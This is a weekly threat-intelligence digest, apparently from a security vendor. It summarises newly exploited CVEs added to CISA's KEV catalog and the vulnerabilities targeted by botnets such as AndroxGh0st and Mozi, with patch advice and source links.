This week, the CISA KEV catalog was updated with seven new CVEs, including two vulnerabilities affecting Microsoft products and another two targeting Palo Alto Networks solutions, highlighting ongoing security concerns. Fortinet cybersecurity researchers have uncovered a new phishing campaign that distributes a fileless variant of RemcosRAT, a previously known commercial malware.  

The threat actors behind AndroxGh0st malware have broadened their tactics, now targeting a wider range of vulnerabilities in internet-facing applications while simultaneously deploying Mozi botnet malware. CloudSEK's recent findings highlight this expanded attack surface, showing how the malware is exploiting various security flaws for initial access, underscoring the increasing sophistication of these attacks.  

The IoT_Reaper botnet continues to exploit vulnerabilities in MVPower CCTV DVRs, securing its foothold in the evolving threat landscape. Meanwhile, Zerobot has shifted focus to a three-year-old vulnerability in the Apache HTTP server. At the same time, other well-established botnets—such as Enemybot, LiquorBot, and Mirai—are capitalizing on a nine-year-old flaw in D-Link DIR 645 routers. These attacks underscore a persistent trend: even long-past vulnerabilities remain lucrative targets for cybercriminals, highlighting the ongoing risk posed by unpatched, legacy flaws.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-9465

Critical SQL injection vulnerability in Palo Alto Networks Expedition. It allows an unauthenticated attacker to access and potentially exfiltrate sensitive data from the Expedition database, including firewall credentials. This vulnerability has been actively exploited, and a proof of concept (PoC) exploit is publicly available, highlighting the urgency for remediation. Organizations using Expedition should immediately apply the security patches or mitigations provided by Palo Alto Networks to protect their systems.

CVE-2024-9463

Critical OS command injection vulnerability in Palo Alto Networks Expedition, allowing an unauthenticated attacker to execute arbitrary operating system commands with root privileges. This vulnerability has a CVSS score of 9.9, indicating its high severity. The vulnerability affects specific versions of the Expedition tool. Palo Alto Networks has acknowledged reports of active exploitation and has advised users to apply the relevant patches or mitigations immediately to secure their systems

CVE-2024-49039

Microsoft has addressed a high severity elevation of privilege vulnerability in Windows Task Scheduler, assigned a CVSS score of 8.8.   The flaw allows authenticated attackers to execute a specially crafted application on a vulnerable system, granting them elevated privileges to a medium integrity level. This vulnerability, now listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, highlights the urgency for organizations to implement the patch to prevent potential exploitation and safeguard system security. ‍

CVE-2024-43451

A Windows vulnerability involving NTLM hash disclosure through spoofing has been identified, requiring minimal user interaction, such as inspecting or interacting with a malicious file. This security flaw, now included in the CISA KEV catalog, poses significant risks to authentication systems and underscores the need for swift patch deployment.

CVE-2024-10914

A critical vulnerability (CVSS 9.8) in D-Link NAS devices allows unauthenticated attackers to execute arbitrary shell commands via specially crafted HTTP GET requests. This flaw is actively being exploited in the wild. Unfortunately, D-Link has confirmed that no fix will be released, as the affected devices have reached their end-of-life and are no longer supported.

‍CVE-2021-41277

A critical Local File Inclusion (LFI) vulnerability with a CVSS score of 10 has been identified in Metabase, an open-source business intelligence tool. The flaw affects the custom GeoJSON map functionality, enabling attackers to gain unauthorized access, and has been added to the CISA KEV catalog due to its severe impact.

CVE-2021-26086

A remote code execution vulnerability has been identified in the Questions for Confluence app, used within Atlassian's Confluence Server and Data Center products. This flaw arises from improper permissions handling, which could allow an unauthenticated attacker to execute arbitrary code on the server. Due to its severity, this vulnerability has been added to the CISA KEV catalog, emphasizing the critical need for timely remediation.

CVE-2014-2120

A cross-site scripting (XSS) vulnerability exists in the WebVPN login page of Cisco's Adaptive Security Appliance (ASA) software, which enables remote attackers to inject malicious web scripts or HTML code through an unspecified parameter. Although this vulnerability was discovered over a decade ago, its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog highlights its ongoing relevance and the need for vigilance among users still running affected versions.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

CVE-2024-43451

ClearSky’s latest research highlights a Windows NTLM hash disclosure spoofing vulnerability that has been leveraged since mid-2024, with attackers deploying the SparkRAT malware as part of this exploit. CERT-UA has attributed these activities to the Russian-based threat actor group UAC-0194, underscoring the growing risk associated with this vulnerability.

CVE-2024-4577

By exploiting a critical PHP argument injection vulnerability, the AndroxGh0st threat group has furthered its cloud-targeting strategy with the integration of the Mozi botnet. With Mozi’s decentralized communication protocol aiding in persistence, AndroxGh0st has focused its efforts on leveraging vulnerabilities to infiltrate key platforms, intensifying its ability to evade standard mitigation techniques and extend its attack footprint.

‍CVE-2024-36401

A critical eval injection vulnerability in GeoServer, which could lead to remote code execution, is now being exploited by the AndroxGh0st malware for intial access, privilege escalation and prolonged system control.   Historically, this vulnerability has attracted exploitation from threat actors deploying the Mirai botnet and GoReverse malware, underscoring its significance in cyberattack frameworks.  

‍CVE-2023-1389

CloudSEK’s analysis reveals a vulnerability in TP-Link Archer firmware versions prior to 1.1.4, is being actively epxloited by threat actors to deploy AndroxGh0st malware. This command injection flaw in the country form makes devices susceptible to initial access attacks.

‍CVE-2022-1040

A severe vulnerability in Sophos Firewall’s User Portal and Webadmin components, rated at CVSS 9.8, has been identified as a key access point exploited by the AndroxGh0st malware. CloudSEK reports that this authentication bypass issue allows attackers to gain unauthorized system access and execute arbitrary commands remotely.

‍CVE-2022-21587

Oracle E-Business Suite has a critical vulnerability affecting versions 12.2.3 to 12.2.11, where an attacker can remotely upload malicious files via HTTP. This security flaw could enable an unauthenticated attacker to gain full control over the application. CloudSEK reports that this remote code execution vulnerability allows attackers to gain unauthorized system access.

‍CVE-2021-41773

A path traversal vulnerability in the Apache HTTP server allows attackers with network access to manipulate crafted URL paths to access files outside of the server’s designated document root, bypassing security controls. CloudSEK's findings indicate that this flaw can grant unauthorized system access, potentially compromising server integrity and sensitive data.

CVE-2021-26086

A remote code execution vulnerability in the Questions for Confluence app within Atlassian’s Confluence Server and Data Center products could allow unauthenticated attackers to execute arbitrary code on the server due to improper permissions handling. CloudSEK has reported that this vulnerability has been exploited by the AndroxGh0st malware to gain initial access.

‍CVE-2021-41277

A critical Local File Inclusion (LFI) vulnerability in Metabase, an open-source business intelligence tool, allows attackers to exploit its custom GeoJSON map functionality, potentially leading to unauthorized access to sensitive files. Rated at CVSS 10, this vulnerability has been observed by CloudSEK as a vector for initial access by the AndroxGh0st malware.

‍CVE-2018-15133

A remote code execution vulnerability has been identified in the Laravel Framework due to an unserialization flaw in its encryption mechanism. According to CloudSEK, this issue has been targeted by AndroxGh0st malware as an entry point for attacks.

‍CVE-2018-10561 and CVE-2018-10562

A critical authentication bypass and command injection vulnerability (CVSS 9.8) in DASAN GPON home routers could allow remote attackers to gain unauthorized access and execute arbitrary commands. According to CloudSEK, these vulnerabilities have been exploited by the AndroxGh0st malware as an initial entry point for attacks.

‍CVE-2017-9841

A critical remote code execution vulnerability (CVSS 9.8) in PHPUnit arises from improper input validation within the framework's PHPUnit\Util\PHP file. This flaw allows attackers to execute arbitrary code on affected systems. According to CloudSEK, AndroxGh0st malware has leveraged this vulnerability to gain initial access in targeted environments.

‍CVE-2017-0199

A remote code execution vulnerability in Microsoft Office and WordPad has been identified, allowing attackers to potentially take full control of affected systems. Fortinet researchers have linked this issue to a phishing campaign that delivers a fileless variant of the Remcos RAT via a malicious Excel document disguised as an order notification.

‍CVE-2014-2120

A cross-site scripting (XSS) vulnerability in the WebVPN login page of Cisco Adaptive Security Appliance (ASA) software enables remote attackers to inject arbitrary web scripts or HTML code through an unspecified parameter. CloudSEK has reported that the AndroxGh0st malware has exploited this vulnerability to gain initial access in targeted systems.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2024/11/12/cisa-adds-five-known-exploited-vulnerabilities-catalog
2. https://thehackernews.com/2024/11/microsoft-fixes-90-new-vulnerabilities.html  
3. https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave
4. https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07
5. https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims